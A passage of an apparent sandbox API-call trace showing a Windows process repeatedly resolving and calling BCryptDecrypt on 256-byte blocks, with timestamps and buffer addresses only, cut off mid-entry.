[0174.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.616] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e855d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204935d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204935d, pcbResult=0x14f8fc) returned 0x0 [0174.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.618] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e856d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049452, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049452, pcbResult=0x14f8fc) returned 0x0 [0174.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.619] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e857d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049547, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049547, pcbResult=0x14f8fc) returned 0x0 [0174.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.620] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e858d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204963c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204963c, pcbResult=0x14f8fc) returned 0x0 [0174.622] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.622] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e859d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049731, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049731, pcbResult=0x14f8fc) returned 0x0 [0174.623] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.623] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e85ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049826, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049826, pcbResult=0x14f8fc) returned 0x0 [0174.625] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.625] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e85bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204991b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204991b, pcbResult=0x14f8fc) returned 0x0 [0174.626] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.626] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e85cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049a10, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049a10, pcbResult=0x14f8fc) returned 0x0 [0174.627] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.627] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e85dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049b05, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049b05, pcbResult=0x14f8fc) returned 0x0 [0174.629] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.629] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e85ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049bfa, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049bfa, pcbResult=0x14f8fc) returned 0x0 [0174.630] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.630] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e85fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049cef, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049cef, pcbResult=0x14f8fc) returned 0x0 [0174.632] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.632] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e860d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049de4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049de4, pcbResult=0x14f8fc) returned 0x0 [0174.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.776] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e861d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049ed9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049ed9, pcbResult=0x14f8fc) returned 0x0 [0174.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.781] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e862d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2049fce, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2049fce, pcbResult=0x14f8fc) returned 0x0 [0174.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.783] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e863d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a0c3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a0c3, pcbResult=0x14f8fc) returned 0x0 [0174.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.785] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e864d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a1b8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a1b8, pcbResult=0x14f8fc) returned 0x0 [0174.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.787] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e865d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a2ad, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a2ad, pcbResult=0x14f8fc) returned 0x0 [0174.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.789] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e866d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a3a2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a3a2, pcbResult=0x14f8fc) returned 0x0 [0174.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.791] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e867d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a497, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a497, pcbResult=0x14f8fc) returned 0x0 [0174.793] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.793] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e868d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a58c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a58c, pcbResult=0x14f8fc) returned 0x0 [0174.794] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.794] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e869d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a681, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a681, pcbResult=0x14f8fc) returned 0x0 [0174.796] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.796] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e86ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a776, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a776, pcbResult=0x14f8fc) returned 0x0 [0174.797] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.797] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e86bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a86b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a86b, pcbResult=0x14f8fc) returned 0x0 [0174.798] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.798] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e86cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204a960, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204a960, pcbResult=0x14f8fc) returned 0x0 [0174.800] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.800] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e86dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204aa55, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204aa55, pcbResult=0x14f8fc) returned 0x0 [0174.801] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.801] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e86ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ab4a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ab4a, pcbResult=0x14f8fc) returned 0x0 [0174.803] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.803] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e86fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ac3f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ac3f, pcbResult=0x14f8fc) returned 0x0 [0174.805] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.805] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e870d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ad34, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ad34, pcbResult=0x14f8fc) returned 0x0 [0174.806] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.806] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e871d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ae29, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ae29, pcbResult=0x14f8fc) returned 0x0 [0174.807] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.807] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e872d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204af1e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204af1e, pcbResult=0x14f8fc) returned 0x0 [0174.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.809] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e873d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b013, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b013, pcbResult=0x14f8fc) returned 0x0 [0174.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.810] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e874d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b108, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b108, pcbResult=0x14f8fc) returned 0x0 [0174.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.811] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e875d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b1fd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b1fd, pcbResult=0x14f8fc) returned 0x0 [0174.979] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.979] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e876d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b2f2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b2f2, pcbResult=0x14f8fc) returned 0x0 [0174.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.982] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e877d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b3e7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b3e7, pcbResult=0x14f8fc) returned 0x0 [0174.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.984] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e878d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b4dc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b4dc, pcbResult=0x14f8fc) returned 0x0 [0174.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.986] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e879d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b5d1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b5d1, pcbResult=0x14f8fc) returned 0x0 [0174.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.988] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e87ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b6c6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b6c6, pcbResult=0x14f8fc) returned 0x0 [0174.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.990] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e87bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b7bb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b7bb, pcbResult=0x14f8fc) returned 0x0 [0174.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.992] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e87cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b8b0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b8b0, pcbResult=0x14f8fc) returned 0x0 [0174.995] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.995] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e87dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204b9a5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204b9a5, pcbResult=0x14f8fc) returned 0x0 [0174.996] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.996] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e87ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204ba9a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204ba9a, pcbResult=0x14f8fc) returned 0x0 [0174.998] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0174.999] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e87fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204bb8f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204bb8f, pcbResult=0x14f8fc) returned 0x0 [0175.000] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.001] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e880d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204bc84, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204bc84, pcbResult=0x14f8fc) returned 0x0 [0175.002] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.002] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e881d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204bd79, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204bd79, pcbResult=0x14f8fc) returned 0x0 [0175.004] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.004] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e882d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204be6e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204be6e, pcbResult=0x14f8fc) returned 0x0 [0175.006] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.006] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e883d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204bf63, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204bf63, pcbResult=0x14f8fc) returned 0x0 [0175.008] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.008] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e884d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c058, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c058, pcbResult=0x14f8fc) returned 0x0 [0175.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.011] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e885d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c14d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c14d, pcbResult=0x14f8fc) returned 0x0 [0175.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.144] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e886d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c242, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c242, pcbResult=0x14f8fc) returned 0x0 [0175.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.146] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e887d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c337, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c337, pcbResult=0x14f8fc) returned 0x0 [0175.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.147] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e888d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c42c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c42c, pcbResult=0x14f8fc) returned 0x0 [0175.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.149] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e889d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c521, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c521, pcbResult=0x14f8fc) returned 0x0 [0175.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.151] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e88ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c616, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c616, pcbResult=0x14f8fc) returned 0x0 [0175.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.152] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e88bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c70b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c70b, pcbResult=0x14f8fc) returned 0x0 [0175.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.154] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e88cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c800, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c800, pcbResult=0x14f8fc) returned 0x0 [0175.155] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.155] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e88dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c8f5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c8f5, pcbResult=0x14f8fc) returned 0x0 [0175.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.157] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e88ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204c9ea, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204c9ea, pcbResult=0x14f8fc) returned 0x0 [0175.158] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.158] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e88fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x204cadf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x204cadf, pcbResult=0x14f8fc) returned 0x0 [0175.160] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.160] BCryptDecrypt (in: hKey=0x2c82b00, 